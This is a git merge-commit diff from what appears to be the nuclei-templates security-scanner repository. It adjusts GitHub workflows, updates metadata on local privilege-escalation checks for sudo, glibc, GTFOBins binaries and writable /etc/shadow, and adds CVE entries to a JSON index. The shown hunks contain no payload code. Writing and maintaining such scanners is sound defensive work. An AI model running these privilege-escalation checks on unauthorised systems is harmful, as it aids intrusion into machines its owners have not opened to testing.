Merge branch 'main' into add-missing-token

patch-1
Dhiyaneshwaran 2024-03-04 22:50:45 +05:30 committed by GitHub
commit 27ead949cf
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
139 changed files with 786 additions and 544 deletions

View File

@ -1,22 +0,0 @@
name: 🗑️ Cache Purge
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
# Wait for 5 minutes
- name: Wait for 2 minutes
run: sleep 120
- name: Purge cache
uses: jakejarvis/cloudflare-purge-action@master
env:
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}

View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
- name: Yamllint

View File

@ -11,6 +11,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:

View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:

View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:

View File

@ -9,6 +9,7 @@ on:
- 'http/cves/2023/CVE-2023-42344.yaml'
- 'http/cves/2023/CVE-2023-45671.yaml'
- 'http/cves/2023/CVE-2023-48777.yaml'
- 'http/cves/2023/CVE-2023-6895.yaml'
- 'http/cves/2024/CVE-2024-0305.yaml'
- 'http/cves/2024/CVE-2024-0713.yaml'
- 'http/cves/2024/CVE-2024-1021.yaml'
@ -25,7 +26,9 @@ on:
- 'http/default-logins/ibm/ibm-dcec-default-login.yaml'
- 'http/default-logins/ibm/ibm-dsc-default-login.yaml'
- 'http/default-logins/ibm/ibm-hmc-default-login.yaml'
- 'http/default-logins/ibm/imm-default-login.yaml'
- 'http/exposed-panels/c2/meduza-stealer.yaml'
- 'http/exposed-panels/cisco-unity-panel.yaml'
- 'http/exposed-panels/connectwise-panel.yaml'
- 'http/exposed-panels/fortinet/fortiauthenticator-detect.yaml'
- 'http/exposed-panels/ibm/ibm-dcec-panel.yaml'
@ -38,6 +41,7 @@ on:
- 'http/exposed-panels/opinio-panel.yaml'
- 'http/exposed-panels/rocketchat-panel.yaml'
- 'http/exposures/configs/sphinxsearch-config.yaml'
- 'http/misconfiguration/cloudflare-rocketloader-htmli.yaml'
- 'http/misconfiguration/installer/connectwise-setup.yaml'
- 'http/technologies/ibm/ibm-decision-runner.yaml'
- 'http/technologies/ibm/ibm-decision-server-runtime.yaml'
@ -49,6 +53,7 @@ on:
workflow_dispatch:
jobs:
triggerRemoteWorkflow:
if: github.repository == 'projectdiscovery/nuclei-templates'
runs-on: ubuntu-latest
steps:
- name: Trigger Remote Workflow with curl

View File

@ -6,6 +6,7 @@ on:
jobs:
Update:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- name: Check out repository code
uses: actions/checkout@v4

View File

@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-38203.yaml
http/cves/2023/CVE-2023-42344.yaml
http/cves/2023/CVE-2023-45671.yaml
http/cves/2023/CVE-2023-48777.yaml
http/cves/2023/CVE-2023-6895.yaml
http/cves/2024/CVE-2024-0305.yaml
http/cves/2024/CVE-2024-0713.yaml
http/cves/2024/CVE-2024-1021.yaml
@ -20,7 +21,9 @@ http/default-logins/ibm/ibm-dcbc-default-login.yaml
http/default-logins/ibm/ibm-dcec-default-login.yaml
http/default-logins/ibm/ibm-dsc-default-login.yaml
http/default-logins/ibm/ibm-hmc-default-login.yaml
http/default-logins/ibm/imm-default-login.yaml
http/exposed-panels/c2/meduza-stealer.yaml
http/exposed-panels/cisco-unity-panel.yaml
http/exposed-panels/connectwise-panel.yaml
http/exposed-panels/fortinet/fortiauthenticator-detect.yaml
http/exposed-panels/ibm/ibm-dcec-panel.yaml
@ -33,6 +36,7 @@ http/exposed-panels/openvas-panel.yaml
http/exposed-panels/opinio-panel.yaml
http/exposed-panels/rocketchat-panel.yaml
http/exposures/configs/sphinxsearch-config.yaml
http/misconfiguration/cloudflare-rocketloader-htmli.yaml
http/misconfiguration/installer/connectwise-setup.yaml
http/technologies/ibm/ibm-decision-runner.yaml
http/technologies/ibm/ibm-decision-server-runtime.yaml

View File

@ -32,3 +32,6 @@ files:
- http/cves/2020/CVE-2020-28351.yaml
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
- http/cves/2021/CVE-2021-28164.yaml
- http/fuzzing/wordpress-themes-detect.yaml
- http/fuzzing/mdb-database-file.yaml
- http/fuzzing/iis-shortname.yaml

View File

@ -9,11 +9,22 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-14287
cwe-id: CWE-755
epss-score: 0.34299
epss-percentile: 0.96958
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
vendor: sudo_project
product: sudo
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
self-contained: true
@ -36,4 +47,4 @@ code:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950

View File

@ -10,8 +10,20 @@ info:
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
- http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
- http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-3156
cwe-id: CWE-193
epss-score: 0.97085
epss-percentile: 0.99752
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: sudo_project
product: sudo
tags: cve,cve2021,sudo,code,linux,privesc,local,kev
self-contained: true
@ -28,4 +40,4 @@ code:
- "malloc(): memory corruption"
- "Aborted (core dumped)"
condition: and
# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950

View File

@ -21,8 +21,8 @@ info:
cvss-score: 7.8
cve-id: CVE-2023-2640
cwe-id: CWE-863
epss-score: 0.00047
epss-percentile: 0.14754
epss-score: 0.00174
epss-percentile: 0.53697
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ code:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950

View File

@ -10,16 +10,21 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
- https://www.youtube.com/watch?v=1iV-CD9Apn8
- http://www.openwall.com/lists/oss-security/2023/10/05/1
- http://www.openwall.com/lists/oss-security/2023/10/13/11
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-4911
cwe-id: CWE-787
cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*
cwe-id: CWE-787,CWE-122
epss-score: 0.0171
epss-percentile: 0.87439
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
self-contained: true
code:
@ -34,4 +39,4 @@ code:
- type: word
words:
- "139" # Segmentation Fault Exit Code
# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950

View File

@ -9,15 +9,21 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
- https://access.redhat.com/security/cve/CVE-2023-6246
- https://bugzilla.redhat.com/show_bug.cgi?id=2249053
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-6246
cwe-id: CWE-787
cwe-id: CWE-787,CWE-122
epss-score: 0.00383
epss-percentile: 0.72435
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,linux,privesc,local
self-contained: true
@ -33,4 +39,4 @@ code:
- type: word
words:
- "127" # Segmentation Fault Exit Code
# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/choom/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,choom,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/find/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,find,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/lua/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,lua,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/mysql/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,mysql,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/node/
metadata:
max-request: 4
verified: true
max-request: 4
tags: code,linux,node,privesc,local
self-contained: true
@ -53,4 +53,4 @@ code:
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/rc/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,rc,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950

View File

@ -8,8 +8,8 @@ info:
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
reference: https://gtfobins.github.io/gtfobins/run-parts/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,run-parts,privesc,local
self-contained: true
@ -45,4 +45,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/strace/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,strace,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/torify/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,torify,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/view/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,view,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/xargs/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,xargs,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950

View File

@ -7,8 +7,8 @@ info:
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
metadata:
max-request: 2
verified: true
max-request: 2
tags: code,linux,privesc,local
self-contained: true
@ -42,4 +42,4 @@ code:
words:
- "Not readable and not writable"
negative: true
# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950

View File

@ -265,6 +265,7 @@
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
@ -2170,6 +2171,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@ -2279,14 +2281,17 @@
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
